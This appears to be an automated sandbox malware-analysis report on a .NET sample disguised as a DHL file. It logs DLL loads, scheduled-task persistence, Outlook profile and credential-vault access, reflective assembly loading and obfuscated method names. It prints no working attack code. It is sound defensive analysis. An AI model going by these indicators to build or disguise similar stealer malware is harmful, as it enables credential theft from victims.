                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: dwrite.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: textshaping.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: vaultcli.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: dwrite.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: textshaping.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: vaultcli.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: DHL_1003671162.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: DHL_1003671162.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      barindex
                      .NET source code contains potential unpacker
                      Source: DHL_1003671162.exe, --.cs.Net Code: _0002
                      Source: qmUxKv.exe.0.dr, --.cs.Net Code: _0002
                      Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack, vOhXJ8g3rtYhX0lVPt.cs.Net Code: CG1Rxu67QA System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack, vOhXJ8g3rtYhX0lVPt.cs.Net Code: CG1Rxu67QA System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.DHL_1003671162.exe.7190000.10.raw.unpack, HomeView.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_0289EBE0 pushad ; iretd 0_2_0289EBE1
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_071B61EF pushad ; retf 0_2_071B61F0
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_071B61E5 pushad ; retf 0_2_071B61E6
                      Source: C:\Users\user\Desktop\DHL_1003671162.exeCode function: 0_2_0AE82C68 push eax; ret 0_2_0AE82C71
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_012AEBE0 pushad ; iretd 7_2_012AEBE1
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06D2D261 pushad ; iretd 7_2_06D2D26D
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06D24383 push eax; retf 7_2_06D24389
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06D2DE00 push es; retf 7_2_06D2DE0C
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06FC61EF pushad ; retf 7_2_06FC61F0
                      Source: C:\Users\user\AppData\Roaming\qmUxKv.exeCode function: 7_2_06FC61E5 pushad ; retf 7_2_06FC61E6
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_016DEBE0 pushad ; iretd 12_2_016DEBE1
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_032BBDD8 push eax; iretd 12_2_032BC505
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_032BC4F8 push eax; iretd 12_2_032BC505
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_077A61EF pushad ; retf 12_2_077A61F0
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 12_2_077A61E5 pushad ; retf 12_2_077A61E6
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_0696F595 push es; iretd 16_2_0696F5C8
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_0696F5DD push es; iretd 16_2_0696F5E0
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_0696F5CD push es; iretd 16_2_0696F5DC
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_0696F5C9 push es; iretd 16_2_0696F5CC
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_0696F510 push es; iretd 16_2_0696F51C
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_0696F51D push es; iretd 16_2_0696F520
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_0696F521 push es; iretd 16_2_0696F524
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_0696F555 push es; iretd 16_2_0696F55C
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_0696F544 push es; iretd 16_2_0696F548
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_0696F549 push es; iretd 16_2_0696F554
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_0696F571 push es; iretd 16_2_0696F57C
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_0696F57D push es; iretd 16_2_0696F588
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_0696F56D push es; iretd 16_2_0696F570
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 16_2_0696FB90 push es; ret 16_2_0696FBA0
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 17_2_025BEBE0 pushad ; iretd 17_2_025BEBE1
                      Source: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeCode function: 20_2_0686F5CF push es; iretd 20_2_0686F5DC
                      Source: DHL_1003671162.exeStatic PE information: section name: .text entropy: 7.970864904869302
                      Source: qmUxKv.exe.0.drStatic PE information: section name: .text entropy: 7.970864904869302
                      Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack, UDLi2hNReX4CONvj27.csHigh entropy of concatenated method names: 'UtJoL6lkKD', 'tx4ohyfqe8', 'qB9ouJ7iNP', 'kYMoEPUVGR', 'Swuo2tks2g', 'In3oXRCrUi', 'JtAyQaFAqWJMfcu9la', 'iQnkRf1wR97RPvWMG0', 'ANmooWTZ67', 'UMroC1ctgG'
                      Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack, KqnPq499EHbIyJkR2c8.csHigh entropy of concatenated method names: 'ToString', 'QcJICPp2My', 'eVMIRLQ64D', 'OLKIZqZqi1', 'uN8IkOxg9D', 'NS8Il8u6WO', 'LQqIbjSBaf', 'ctDIyDu2EN', 'REPdQWCVtXCbPRHhhoJ', 'lUHsBbCcP3fnxMRO0Sm'
                      Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack, FreH877o4sX9uPE3R8.csHigh entropy of concatenated method names: 'Q7gasY93qA', 'H3BaYUBxlm', 'w786m6GmEk', 'g8A6oXMcKI', 'OICa9lHIuC', 'osCaK790Mn', 'TjWa7PMftu', 'Rc3afMriiJ', 'MsCa0xmSr1', 'cRBaiUo0kQ'
                      Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack, piTvKODFSX0jcR75aU.csHigh entropy of concatenated method names: 'S4WlfLN1ap', 'Iynl037Jk0', 'xxQlidwl2A', 'FkCl502j6J', 'HnylPdJpV0', 'LRLlHdkBmj', 'UIjlFJkedP', 'LeClsuenhH', 'zfult1FKEi', 'tdhlYGgttl'
                      Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack, X4QbFhkZug2cenpRr5.csHigh entropy of concatenated method names: 'zt9xP6OBL', 'AZFN7TMwO', 'c9yDVpiVr', 'M5hAESLWl', 'tuyju6FKG', 'taeVEZExT', 'FToZ59wpwD8bPswR7O', 'ybukZ0rogHfMMmAf2m', 'DJV64vrKk', 'st2IvgsJF'
                      Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack, bsHBr02E3QP21WBYUb.csHigh entropy of concatenated method names: 'tEXy8XsE6A', 'sAqyA053R7', 'RkPbroZtkT', 'sw2bSBjaAF', 'mNhbdn4DQK', 'xg8bWbYywV', 'ejIbG69J5G', 'lpmb3NZNgK', 'fTUbcxwVBe', 'oqEbqRBtPS'
                      Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack, DYrTp3RpBrcAQ48aRP.csHigh entropy of concatenated method names: 'vMXvnV5p58', 'QUjvjRhDCY', 'trLvgLqBp6', 'pmSvw9QCK7', 'CBtvSrYsDL', 'fIsvdwIV0R', 'qSGvGG7rjv', 'Qeqv34j0o9', 'VC2vqQIurs', 'shbv9eCMwT'
                      Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack, yJ4pUYn5sgxJhbv7hC.csHigh entropy of concatenated method names: 'ToString', 'x7eX98o8qM', 'IfPXwFiiAc', 'yxdXrbkbHt', 'o6AXSya3Ho', 'uQJXd6f354', 'kLeXWr8R2O', 'YbbXGbKZ5f', 'A1WX3Hagul', 'S3GXcSfUA5'
                      Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack, LuIa5X9Q5EbKdhRLPSM.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'S2cIfP9UxH', 'TEjI0RygJx', 'YEjIioXTbT', 'VegI5wtwG1', 'KuQIPvMnVM', 'cx2IHFeP1n', 'PqTIFd2UFg'
                      Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack, JWZACIxbZJglXKaQMs.csHigh entropy of concatenated method names: 'RW96ktGbjg', 'Stt6lC4P69', 'vtU6bp5ieh', 'oFL6ymiT4v', 'eXH6pNnOhS', 'ocx6LjSHTZ', 'oY16hHEWP1', 'KJC61LtAtL', 'VDH6uHFIYi', 'PCD6EDr3PP'
                      Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack, sQqsr7mVJoIxdM5oA4.csHigh entropy of concatenated method names: 'DgRBoFENVg', 'RkXBC8Htnc', 'yRfBRlFxNp', 'RErBk2sfo5', 'AerBlsEKRP', 'unMByscLIB', 'VN8Bp9Uapv', 'tTD6FJmDlG', 'yAb6sIC9uw', 'MJL6tKcXWq'
                      Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack, vOhXJ8g3rtYhX0lVPt.csHigh entropy of concatenated method names: 'luPCZxhWTh', 'kNWCkt53PR', 'vq6Cl9cj2E', 'PbUCbayEoc', 'tuGCydIfDK', 'CpyCpoXWOt', 'QXNCLytZrI', 'XZdChSmPCk', 'kamC1aVjIM', 'uTxCuDDxb7'
                      Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack, CTqb1798DD5AVCLbISG.csHigh entropy of concatenated method names: 'XnwBTLFHID', 'XgKBO9yoqG', 'T5OBxYjLp5', 'YjmBN6cQbA', 'pHUB8tmYZU', 'iZuBD6KfcE', 'Di1BAVQGrn', 'RK7BnkedKj', 'zETBj0K3hT', 'ULQBV2rqjR'
                      Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack, bs8JYKbstmUGM4KZC5.csHigh entropy of concatenated method names: 'vQa2qBtNyG', 'ptK2K3vCk3', 'rlV2fWtlxp', 'Qun20EDM7s', 'QaO2wMMrQj', 'YjH2rVxU0O', 'Lf72S7kTCS', 'NaS2dFxREr', 'MPP2WtR4qy', 'vRt2GjfrSw'
                      Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack, P3973JSS1uHOuImRZr.csHigh entropy of concatenated method names: 'rPwLTvEFcc', 'nXELObgqWv', 'hSXLxiG1Nw', 'HHyLNmB8Mc', 'lGIL8JmSQy', 'H5RLDUyG9I', 'z8mLAJNR1Q', 'DQwLnbJeDl', 'v38LjPxnWS', 'eltLVJWKsb'
                      Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack, qBd2SG446YqF3cs3NQ.csHigh entropy of concatenated method names: 'p9DpZyqQf0', 'tMOplys8NP', 'cEUpyUBKL8', 'V6ipLgYBmh', 'pxhphL6wGH', 'X11yPanI9X', 'iw1yHgZAMk', 'Ti5yFUuxQZ', 'RLDys8nbrc', 'cppyt0GKqQ'
                      Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack, naZD7mUeXTTXCKTeje.csHigh entropy of concatenated method names: 'IowbNi0sr0', 'HoWbDvcc6v', 'Mrqbn7UxSk', 'GsdbjUrEer', 'Tl2b2n16Lt', 'r3xbXp8w0S', 'mwmbaqfliE', 'wipb68AB4O', 'RrfbBBlQiO', 'kBAbIQ7eqs'
                      Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack, eRHt7R6gPnlIwRrgTm.csHigh entropy of concatenated method names: 'Dispose', 'sDZotBlIgO', 'Iva4w9fmk9', 'wh4QQ8D560', 'Q0LoYliEIk', 'cmxoz558ms', 'ProcessDialogKey', 'Oax4mWeqgW', 'l9t4omAy55', 'UiZ44bGEMJ'
                      Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack, TugaGtyyvR22O79f5m.csHigh entropy of concatenated method names: 'K0C6gGI1tq', 'yjt6wXtY22', 'vXj6rWk85G', 'WDo6SG56rK', 'DnR6fMktEu', 'ySJ6dyYx1C', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack, bgN9lyTujGQaMq3Srn.csHigh entropy of concatenated method names: 'itjauOfbbs', 'lRlaECd297', 'ToString', 'Ys6akr1AKH', 'Vf0alYyvfQ', 'OxOabSR6UE', 'l6Xay3fN2F', 'U3GapO6MNM', 'fqLaLBlRtS', 'sbqah80EvE'
                      Source: 0.2.DHL_1003671162.exe.b170000.12.raw.unpack, M1HstWYGcIVYjLGXJk.csHigh entropy of concatenated method names: 'DlpLkVSTQd', 'jxjLbvLx9s', 'PHiLpGOv7Q', 'rYipY4Uhe0', 'kDTpzRYtkW', 'n4yLmgKu0M', 'zlMLo3MqAO', 'r1CL4wNJto', 'BhlLCKNR5O', 'CHELRd5TnL'
                      Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack, UDLi2hNReX4CONvj27.csHigh entropy of concatenated method names: 'UtJoL6lkKD', 'tx4ohyfqe8', 'qB9ouJ7iNP', 'kYMoEPUVGR', 'Swuo2tks2g', 'In3oXRCrUi', 'JtAyQaFAqWJMfcu9la', 'iQnkRf1wR97RPvWMG0', 'ANmooWTZ67', 'UMroC1ctgG'
                      Source: 0.2.DHL_1003671162.exe.4662b80.7.raw.unpack, KqnPq499EHbIyJkR2c8.csHigh entropy of concatenated method names: 'ToString', 'QcJICPp2My', 'eVMIRLQ64D', 'OLKIZqZqi1', 'uN8IkOxg9D', 'NS8Il8u6WO', 'LQqIbjSBaf', 'ctDIyDu2EN', 'REPdQWCVtXCbPRHhhoJ', 'lUHsBbCcP3fnxMRO0Sm'
